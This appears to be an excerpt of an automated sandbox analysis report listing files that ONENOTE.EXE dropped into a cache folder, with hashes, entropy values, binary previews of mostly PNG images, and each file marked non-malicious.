                                                                                                                                            File Type:Matlab v4 mat-file (little endian) \210, numeric, rows 262223750, columns 0
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):72
                                                                                                                                            Entropy (8bit):2.588026754162473
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:ulXl3lr//aaolJl//Rtl:K1olNX
                                                                                                                                            MD5:EBBB118AA8C75C3B63F048F5218420C1
                                                                                                                                            SHA1:CFB539EDEA5530071C37B823DBF57FDF4DECECD0
                                                                                                                                            SHA-256:61709D7757DBA63BF6B5A8E16103AF2074CD6F0F1483111FFE727F8B5E6F2565
                                                                                                                                            SHA-512:FD94698209E3FF48BC7865161CD74CC218494CBE575D63BB177612DDA999DD5A996E5457D0FDB15137FCB62327247C7837D7BCE3E356000AAE7A4386625C9659
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.....7.........................................@.,..T..@j*..............

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000005.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3679
                                                                                                                                            Entropy (8bit):7.931319059366604
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                            MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                            SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                            SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                            SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000006.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2232
                                                                                                                                            Entropy (8bit):7.837610270261933
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                            MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                            SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                            SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                            SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000007.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000008.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13084
                                                                                                                                            Entropy (8bit):7.940058639272698
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                            MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                            SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                            SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                            SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000009.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000A.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4847
                                                                                                                                            Entropy (8bit):7.950192613458318
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                            MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                            SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                            SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                            SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000B.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000C.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1657
                                                                                                                                            Entropy (8bit):7.80882577056055
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                            MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                            SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                            SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                            SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000D.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2210
                                                                                                                                            Entropy (8bit):7.86853667196985
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                            MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                            SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                            SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                            SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000E.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14458
                                                                                                                                            Entropy (8bit):7.944094738048628
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                            MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                            SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                            SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                            SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000F.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13030
                                                                                                                                            Entropy (8bit):7.948664903731204
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                            MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                            SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                            SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                            SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000G.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3879
                                                                                                                                            Entropy (8bit):7.9281351307465044
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                            MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                            SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                            SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                            SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000H.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):19235
                                                                                                                                            Entropy (8bit):7.944867159042578
                                                                                                                                            Encrypted:false
